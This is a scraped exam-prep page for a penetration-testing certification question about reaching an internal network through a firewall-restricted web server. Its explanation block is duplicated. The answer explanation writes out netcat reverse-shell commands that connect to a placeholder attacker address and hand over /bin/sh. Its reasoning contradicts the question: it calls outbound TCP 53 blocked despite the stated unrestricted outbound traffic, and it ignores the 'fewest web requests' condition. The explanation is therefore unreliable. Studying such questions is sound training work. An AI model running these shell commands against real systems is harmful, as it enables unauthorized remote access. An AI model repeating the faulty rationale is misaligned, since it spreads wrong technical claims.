Exam PT0-003 Topic 3 Question 79 Discussion
Actual exam question for CompTIA's PT0-003 exam
Question #: 79
Topic #: 3
Question #: 79
Topic #: 3
A penetration tester finds an unauthenticated RCE vulnerability on a web server and wants to use it to enumerate other servers on the local network. The web server is behind a firewall that allows only an incoming connection to TCP ports 443 and 53 and unrestricted outbound TCP connections. The target web server is https://target.comptia.org. Which of the following should the tester use to perform the task with the fewest web requests?
Suggested Answer: D Vote an answer
The tester needs to pivot from the compromised web server while bypassing firewall restrictions that allow:
Inbound traffic only on TCP 443 (HTTPS) and TCP 53 (DNS)
Unrestricted outbound traffic
Reverse shell using TCP 443 (Option D):
This command initiates an outbound connection to the pentester's machine on port 443, which is allowed by the firewall.
Example:
/bin/sh -c 'nc <pentester_ip> 443 -e /bin/sh'
The pentester listens on TCP 443 and receives the shell from the target.
Reference:
Incorrect options:
Option A (nc -e /bin/sh -lp 53): This listens on TCP 53, but does not establish an outbound connection.
Option B (nc -l -p 443): Listens locally but does not connect back to the attacker.
Option C (nc -e /bin/sh <pentester_ip> 53): TCP 53 is inbound only, meaning this connection will be blocked.
Inbound traffic only on TCP 443 (HTTPS) and TCP 53 (DNS)
Unrestricted outbound traffic
Reverse shell using TCP 443 (Option D):
This command initiates an outbound connection to the pentester's machine on port 443, which is allowed by the firewall.
Example:
/bin/sh -c 'nc <pentester_ip> 443 -e /bin/sh'
The pentester listens on TCP 443 and receives the shell from the target.
Reference:
Incorrect options:
Option A (nc -e /bin/sh -lp 53): This listens on TCP 53, but does not establish an outbound connection.
Option B (nc -l -p 443): Listens locally but does not connect back to the attacker.
Option C (nc -e /bin/sh <pentester_ip> 53): TCP 53 is inbound only, meaning this connection will be blocked.
by Hannah at Jun 17, 2026, 01:07 AM
Contact Us
If you have any question please leave me your email address, we will reply and send email to you in 12 hours.
Our Working Time: ( GMT 0:00-15:00 ) From Monday to Saturday
Support: Contact now
Comments
Upvoting a comment with a selected answer will also increase the vote count towards that answer by one. So if you see a comment that you already agree with, you can upvote it instead of posting a new comment.
Report Comment
Commenting
You can sign-up / login (it's free).